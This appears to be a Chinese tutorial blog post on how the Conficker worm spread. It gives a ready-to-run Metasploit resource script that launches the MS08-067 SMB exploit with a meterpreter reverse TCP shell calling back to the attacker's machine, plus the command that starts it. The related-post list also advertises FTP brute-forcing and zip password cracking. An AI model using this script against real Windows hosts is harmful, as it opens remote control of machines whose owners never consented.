【Python脚本进阶】2.4、conficker蠕虫(上):Metasploit攻击Windows SMB服务
目录
一、简介
1.1、分析:
二、Metasploit攻击Windows SMB服务
2.1、分析:
2.2、示例:
一、简介
1.1、分析:
在其基本的感染方法中, Conficker蠕虫使用了两种不同的攻击方法。
1、利用了Windows服务器中一个服务的Oday漏洞。利用这个栈溢出漏洞, 蠕虫能在被感染的主机上执行shellcode并下载蠕虫。
2、Conficker蠕虫暴力破解默认的管理员网络共享(ADMN$)的口令以获取肉机访问权。
二、Metasploit攻击Windows SMB服务
2.1、分析:
利用Metasploit框架(http://metasploit.com/download/)简化攻击代码。作为一个开源计算机安全项目,很快就被广泛使用, 并且已经变成了一个漏洞利用代码的开发工具包。
Metasploit能让渗透测试人员在标准化和脚本化的环境中运行数以千计的不同的计算机漏洞利用代码。在Con.ticker蠕虫中使用的漏洞曝光后不久, HDMoore就将一个有效的漏洞利用代码整合进了框架内—-MS08-067 _netapi
2.2、示例:
虽然攻击者可以通过交互驱动的方式使用Metasploit, 但Metasploit也能读取批处理脚本(re)完成攻击。在攻击时,Metasploit会顺序执行批处理文件中的命令。
如使用ms08 _ 067 netapi (Conficker)攻击“ 肉机” (192.168.x.x), 使之与我们自己的主机192.168.xx.xx的7777端口建立一个反向shell
use exploit/windows/smb/ms08_ 067_netapi set RHOST 192.168.x.x set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.xx.xx set LPORT 7777 exploit -j -z
使用Metasploit进行攻击时, 先选好要用的漏洞利用代码(exploit/windows/smb/ms08 _ 067 _ netapi)
选定目标,目标设置为192.168.1.37
设定负载为windows/meterpreter/reverse _ tcp
将反向连接的目标设为主机192.168.77.77, 端口为7777
最后Metasploit去实施攻击。
将上面这些代码保存为文件conficker.rc。只要输入命令msfconsole -r conficker.rc, 就能发起攻击。这条命令让Metasploit运行脚本conficker.rc中的指令。如果攻击成功, 会返回一个让我们能控制目标计算机的Windows 命令行shell。
【Python脚本进阶】2.4、conficker蠕虫(上):Metasploit攻击Windows SMB服务相关推荐
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(终)
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- xp python转化为exe_使用Py2exe从python脚本生成的exe在xp上不起作用
我有一个python脚本,在我的计算机上运行良好(安装了python2.732位).它有以下进口产品:import mechanize from bs4 import BeautifulSoup fr ...
- python批量删除微信好友_黑科技,Python 脚本帮你找出微信上删除你好友的人(附视频教程)...
" 清理下[微笑],不用回.你的朋友圈没事也该清清了,打开设置,通用,功能,群助手,全选,把我的信息粘贴一下,就可以了,发送就知道谁把你删了,方便你清人,不清不知道 ,一清吓一跳." ...
- 黑科技,Python 脚本帮你找出微信上删除你好友的人
编者按:本文来自稀土掘金江昪编译自 Github:0x5e/wechat-deleted-friends " 清理下[微笑],不用回.你的朋友圈没事也该清清了,打开设置,通用,功能,群助手 ...
- Python 脚本帮你找出微信上删除你好友的人
本文来自稀土掘金江昪编译自 Github:0x5e/wechat-deleted-friends " 清理下[微笑],不用回.你的朋友圈没事也该清清了,打开设置,通用,功能,群助手,全选, ...
- 【Python脚本进阶】1.3、第二个脚本:Zip文件口令破解机
目录 一.简介 概述: 二.示例 示例: 优化 提高性能 任意性 注: 测试方法: 一.简介 概述: 编写Zip文件口令破解机要学习zipfile 库的使用方法 打开Python解释器, 我们用hel ...
- 【Python脚本进阶】2.1、端口扫描器(下):NMAP端口扫描
目录 一.简介 1.1.扩展 1.2.端口扫描类型 1.3.实现: 一.简介 1.1.扩展 由TCP连接扫描脚本,到其他类型的扫描,Nmap端口扫描工具包提供了大量的功能,如提供的ACK.RST.FI ...
- python找人脚本_黑科技 Python脚本帮你找出微信上删除你好友的人
怎么利用 Python 查看被删的微信好友几种方法可以找回被删除的好友,方法也许不全,但是希望可以帮到大家. 不用群发用Python脚本查微信被哪些好友删除 Python大法已经被网友们玩儿的出神入化 ...
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(中):使用Ftplib暴力破解FTP用户口令
一.简介 1.1.概述: 虽然匿名访问是进入系统的方式之一, 但攻击者也能成功地用偷来的用户名/密码访问合法的FTP 服务器.FileZilla 之类的FTP 客户端程序往往将密码以明文形式存储在配置 ...
- 【Python脚本进阶】2.1、端口扫描器(上):TCP全连接扫描
目录 一.简介 1.1.基础: 1.2.TCP: 二.TCP全连接扫描 2.1.简介: 2.2.函数: 2.3.实现: 第一步:获得主机名和端口 第二步: connScan和portScan函数 第三 ...
最新文章
- 卷积有多少种?一文读懂深度学习中的各种卷积
- Linux搭建FTP
- python 实现队列功能 queue insert() pop()
- 常用命令集合_Windows
- Springboot 常用注解
- 入口函数ufusr()的示例 3.2.2
- java binaryreader_Java字符流与字节流区别与用法分析
- hdu_2476_String painter(区间DP)
- JSP——九大内置对象和其四大作用域
- 4. 嵌入式OpenWRT入门基础篇-----设置OpenWRT系统为AP、中继模式
- 统计学和算法相关的基础知识(持续更新)
- java首行缩进两个字符,都是首行缩进2字符,为什么缩进又不相同.d – 手机爱问...
- 2019年年终总结及明年的期望
- 有趣的设计模式——两脚插头也能使用三孔插板
- 故障排查——CPU使用率过高
- (CCTV2视频)中国动画80年
- 颈椎病自我治疗预防颈椎病
- D. Serval and Rooted Tree(思维+树形dp+二分辅助)
- Verilog语言入门
- Matlab 2014a 安装